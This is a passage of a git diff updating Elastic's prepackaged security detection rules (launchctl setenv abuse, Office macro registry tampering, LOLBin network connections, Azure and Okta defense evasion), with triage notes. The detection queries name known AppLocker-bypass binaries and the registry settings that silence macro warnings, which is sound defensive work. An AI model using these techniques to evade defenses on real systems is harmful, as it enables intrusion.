\"/usr/local/bin/kr\" or\n \"/Applications/NoMachine.app/Contents/Frameworks/bin/nxserver.bin\" or\n \"/Applications/IntelliJ IDEA CE.app/Contents/jbr/Contents/Home/lib/jspawnhelper\")\n", + "query": "event.category:process and event.type:start and\n process.name:launchctl and\n process.args:(setenv and not (JAVA*_HOME or\n RUNTIME_JAVA_HOME or\n DBUS_LAUNCHD_SESSION_BUS_SOCKET or\n ANT_HOME or\n LG_WEBOS_TV_SDK_HOME or\n WEBOS_CLI_TV or\n EDEN_ENV)\n ) and\n not process.parent.executable:(\"/Applications/NoMachine.app/Contents/Frameworks/bin/nxserver.bin\" or\n \"/usr/local/bin/kr\" or\n \"/Applications/NoMachine.app/Contents/Frameworks/bin/nxserver.bin\" or\n \"/Applications/IntelliJ IDEA CE.app/Contents/jbr/Contents/Home/lib/jspawnhelper\") and\n not process.args : \"*.vmoptions\"\n", "references": [ "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/osx/escalate/tccbypass.rb" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1", "severity": "medium", @@ -51,5 +78,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_ms_office_suspicious_regmod.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_ms_office_suspicious_regmod.json index 71e18a0268091..8018e4bcbc343 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_ms_office_suspicious_regmod.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_ms_office_suspicious_regmod.json @@ -11,10 +11,33 @@ "language": "eql", "license": "Elastic License v2", "name": "MS Office Macro Security Registry Modifications", - "note": "## Triage and analysis\n\n### Investigating MS Office Macro Security Registry Modifications\n\nMacros are small programs that are used to automate repetitive tasks in Microsoft Office applications.\nHistorically, macros have been used for a variety of reasons -- from automating part of a job, to\nbuilding entire processes and data flows. Macros are written in Visual Basic for Applications (VBA) and are saved as\npart of Microsoft Office files.\n\nMacros are often created for legitimate reasons, but they can also be written by attackers to gain access, harm a\nsystem, or bypass other security controls such as application allow listing. In fact, exploitation from malicious macros\nis one of the top ways that organizations are compromised today. These attacks are often conducted through phishing or\nspear phishing campaigns.\n\nAttackers can convince victims to modify Microsoft Office security settings, so their macros are trusted by default and\nno warnings are displayed when they are executed. These settings include:\n\n* *Trust access to the VBA project object model* - When enabled, Microsoft Office will trust all macros and run any code\nwithout showing a security warning or requiring user permission.\n* *VbaWarnings* - When set to 1, Microsoft Office will trust all macros and run any code without showing a security\nwarning or requiring user permission.\n\nThis rule looks for registry changes affecting the conditions above.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the user and check if the change was done manually.\n- Verify whether malicious macros were executed after the registry change.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve recently executed Office documents and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true\npositives (B-TPs), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Reset the registry key value.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Explore using GPOs to manage security settings for Microsoft Office macros.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "registry where event.type == \"change\" and\n registry.path : (\n \"HKU\\\\S-1-5-21-*\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\*\\\\Security\\\\AccessVBOM\",\n \"HKU\\\\S-1-5-21-*\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\*\\\\Security\\\\VbaWarnings\"\n ) and \n registry.data.strings == \"0x00000001\" and\n process.name : (\"cscript.exe\", \"wscript.exe\", \"mshta.exe\", \"mshta.exe\", \"winword.exe\", \"excel.exe\")\n", + "note": "## Triage and analysis\n\n### Investigating MS Office Macro Security Registry Modifications\n\nMacros are small programs that are used to automate repetitive tasks in Microsoft Office applications.\nHistorically, macros have been used for a variety of reasons -- from automating part of a job, to\nbuilding entire processes and data flows. Macros are written in Visual Basic for Applications (VBA) and are saved as\npart of Microsoft Office files.\n\nMacros are often created for legitimate reasons, but they can also be written by attackers to gain access, harm a\nsystem, or bypass other security controls such as application allow listing. In fact, exploitation from malicious macros\nis one of the top ways that organizations are compromised today. These attacks are often conducted through phishing or\nspear phishing campaigns.\n\nAttackers can convince victims to modify Microsoft Office security settings, so their macros are trusted by default and\nno warnings are displayed when they are executed. These settings include:\n\n* *Trust access to the VBA project object model* - When enabled, Microsoft Office will trust all macros and run any code\nwithout showing a security warning or requiring user permission.\n* *VbaWarnings* - When set to 1, Microsoft Office will trust all macros and run any code without showing a security\nwarning or requiring user permission.\n\nThis rule looks for registry changes affecting the conditions above.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the user and check if the change was done manually.\n- Verify whether malicious macros were executed after the registry change.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve recently executed Office documents and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true\npositives (B-TPs), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Reset the registry key value.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Explore using GPOs to manage security settings for Microsoft Office macros.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "registry where event.type == \"change\" and\n registry.path : (\n \"HKU\\\\S-1-5-21-*\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\*\\\\Security\\\\AccessVBOM\",\n \"HKU\\\\S-1-5-21-*\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\*\\\\Security\\\\VbaWarnings\"\n ) and\n registry.data.strings == \"0x00000001\" and\n process.name : (\"cscript.exe\", \"wscript.exe\", \"mshta.exe\", \"mshta.exe\", \"winword.exe\", \"excel.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "feeed87c-5e95-4339-aef1-47fd79bcfbe3", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -64,5 +87,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_msbuild_making_network_connections.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_msbuild_making_network_connections.json index 6d0110c229c33..95bb6c8a22f9d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_msbuild_making_network_connections.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_msbuild_making_network_connections.json @@ -13,6 +13,28 @@ "license": "Elastic License v2", "name": "MsBuild Making Network Connections", "query": "sequence by process.entity_id\n [process where process.name : \"MSBuild.exe\" and event.type == \"start\"]\n [network where process.name : \"MSBuild.exe\" and\n not cidrmatch(destination.ip, \"127.0.0.1\", \"::1\")]\n", + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "0e79980b-4250-4a50-a509-69294c14e84b", "severity": "medium", @@ -48,5 +70,5 @@ } ], "type": "eql", - "version": 8 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_mshta_beacon.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_mshta_beacon.json index 7263381bfd007..46ea6bc42bd71 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_mshta_beacon.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_mshta_beacon.json @@ -13,6 +13,38 @@ "license": "Elastic License v2", "name": "Mshta Making Network Connections", "query": "sequence by process.entity_id with maxspan=10m\n [process where event.type in (\"start\", \"process_started\") and process.name : \"mshta.exe\" and\n not process.parent.name : \"Microsoft.ConfigurationManagement.exe\" and\n not (process.parent.executable : \"C:\\\\Amazon\\\\Amazon Assistant\\\\amazonAssistantService.exe\" or\n process.parent.executable : \"C:\\\\TeamViewer\\\\TeamViewer.exe\") and\n not process.args : \"ADSelfService_Enroll.hta\"]\n [network where process.name : \"mshta.exe\"]\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "c2d90150-0133-451c-a783-533e736c12d7", "severity": "medium", @@ -34,7 +66,7 @@ "technique": [ { "id": "T1218", - "name": "Signed Binary Proxy Execution", + "name": "System Binary Proxy Execution", "reference": "https://attack.mitre.org/techniques/T1218/", "subtechnique": [ { @@ -48,5 +80,5 @@ } ], "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_msxsl_network.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_msxsl_network.json index 8f8871b75022e..ae6c7244ce053 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_msxsl_network.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_msxsl_network.json @@ -16,6 +16,28 @@ "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "b86afe07-0d98-4738-b15d-8d7465f95ff5", "severity": "low", @@ -44,5 +66,5 @@ } ], "type": "eql", - "version": 7 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_network_connection_from_windows_binary.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_network_connection_from_windows_binary.json index 3b2fc2d414465..ec99f11b91dbe 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_network_connection_from_windows_binary.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_network_connection_from_windows_binary.json @@ -13,6 +13,23 @@ "license": "Elastic License v2", "name": "Unusual Network Activity from a Windows System Binary", "query": "sequence by process.entity_id with maxspan=5m\n [process where event.type in (\"start\", \"process_started\") and\n\n /* known applocker bypasses */\n (process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"control.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"installutil.exe\" or\n process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"MSBuild.exe\" or\n process.name : \"msdt.exe\" or\n process.name : \"mshta.exe\" or\n process.name : \"msiexec.exe\" or\n process.name : \"msxsl.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"regsvr32.exe\" or\n process.name : \"xwizard.exe\")]\n [network where\n (process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"control.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"installutil.exe\" or\n process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"MSBuild.exe\" or\n process.name : \"msdt.exe\" or\n process.name : \"mshta.exe\" or\n process.name : \"msiexec.exe\" or\n process.name : \"msxsl.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"regsvr32.exe\" or\n process.name : \"xwizard.exe\")]\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "1fe3b299-fbb5-4657-a937-1d746f2c711a", "severity": "medium", @@ -41,5 +58,5 @@ } ], "type": "eql", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_network_watcher_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_network_watcher_deletion.json index 135f70740692c..b42425bd62113 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_network_watcher_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_network_watcher_deletion.json @@ -14,13 +14,38 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Network Watcher Deletion", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.NETWORK/NETWORKWATCHERS/DELETE\" and event.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/network-watcher/network-watcher-monitoring-overview" ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "323cb487-279d-4218-bcbd-a568efe930c6", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -56,5 +81,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_deactivate_okta_policy.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_deactivate_okta_policy.json similarity index 53% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_deactivate_okta_policy.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_deactivate_okta_policy.json index 45605a297987b..61081ee13ad03 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_deactivate_okta_policy.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_deactivate_okta_policy.json @@ -13,15 +13,34 @@ "language": "kuery", "license": "Elastic License v2", "name": "Attempt to Deactivate an Okta Policy", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:okta.system and event.action:policy.lifecycle.deactivate\n", "references": [ "https://help.okta.com/en/prod/Content/Topics/Security/Security_Policies.htm", "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/" ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "b719a170-3bdb-4141-b0e3-13e3cf627bfe", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -29,9 +48,34 @@ "Okta", "Continuous Monitoring", "SecOps", - "Monitoring" + "Monitoring", + "Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.007", + "name": "Disable or Modify Cloud Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/007/" + } + ] + } + ] + } ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_deactivate_okta_policy_rule.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_deactivate_okta_policy_rule.json similarity index 50% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_deactivate_okta_policy_rule.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_deactivate_okta_policy_rule.json index ba25dde279426..a652bb337b6ec 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_deactivate_okta_policy_rule.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_deactivate_okta_policy_rule.json @@ -13,15 +13,34 @@ "language": "kuery", "license": "Elastic License v2", "name": "Attempt to Deactivate an Okta Policy Rule", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:okta.system and event.action:policy.rule.deactivate\n", "references": [ "https://help.okta.com/en/prod/Content/Topics/Security/Security_Policies.htm", "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/" ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "cc92c835-da92-45c9-9f29-b4992ad621a0", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -29,9 +48,34 @@ "Okta", "Continuous Monitoring", "SecOps", - "Identity and Access" + "Identity and Access", + "Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.007", + "name": "Disable or Modify Cloud Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/007/" + } + ] + } + ] + } ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_delete_okta_policy.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_delete_okta_policy.json similarity index 52% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_delete_okta_policy.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_delete_okta_policy.json index 47660e2d5d73e..228a3a9d18aca 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_delete_okta_policy.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_delete_okta_policy.json @@ -13,15 +13,34 @@ "language": "kuery", "license": "Elastic License v2", "name": "Attempt to Delete an Okta Policy", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:okta.system and event.action:policy.lifecycle.delete\n", "references": [ "https://help.okta.com/en/prod/Content/Topics/Security/Security_Policies.htm", "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/" ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "b4bb1440-0fcb-4ed1-87e5-b06d58efc5e9", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -29,9 +48,34 @@ "Okta", "Continuous Monitoring", "SecOps", - "Monitoring" + "Monitoring", + "Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.007", + "name": "Disable or Modify Cloud Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/007/" + } + ] + } + ] + } ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_delete_okta_policy_rule.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_delete_okta_policy_rule.json new file mode 100644 index 0000000000000..c37efcc0b50ad --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_delete_okta_policy_rule.json @@ -0,0 +1,81 @@ +{ + "author": [ + "Elastic" + ], + "description": "Detects attempts to delete a rule within an Okta policy. An adversary may attempt to delete an Okta policy rule in order to weaken an organization's security controls.", + "false_positives": [ + "Consider adding exceptions to this rule to filter false positives if Okta MFA rules are regularly modified in your organization." + ], + "index": [ + "filebeat-*", + "logs-okta*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Attempt to Delete an Okta Policy Rule", + "note": "", + "query": "event.dataset:okta.system and event.action:policy.rule.delete\n", + "references": [ + "https://help.okta.com/en/prod/Content/Topics/Security/Security_Policies.htm", + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/" + ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "d5d86bf5-cf0c-4c06-b688-53fdc072fdfd", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "low", + "tags": [ + "Elastic", + "Identity", + "Okta", + "Continuous Monitoring", + "SecOps", + "Monitoring", + "Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.007", + "name": "Disable or Modify Cloud Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 6 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_modify_okta_network_zone.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_modify_okta_network_zone.json similarity index 53% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_modify_okta_network_zone.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_modify_okta_network_zone.json index de94a52a4caa4..695db5c35895c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_modify_okta_network_zone.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_okta_attempt_to_modify_okta_network_zone.json @@ -13,15 +13,34 @@ "language": "kuery", "license": "Elastic License v2", "name": "Attempt to Modify an Okta Network Zone", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:okta.system and event.action:(zone.update or network_zone.rule.disabled or zone.remove_blacklist)\n", "references": [ "https://help.okta.com/en/prod/Content/Topics/Security/network/network-zones.htm", "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/" ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "e48236ca-b67a-4b4e-840c-fdc7782bc0c3", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -29,9 +48,34 @@ "Okta", "Continuous Monitoring", "SecOps", - "Network Security" + "Network Security", + "Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.007", + "name": "Disable or Modify Cloud Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/007/" + } + ] + } + ] + } ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_modify_okta_policy.json 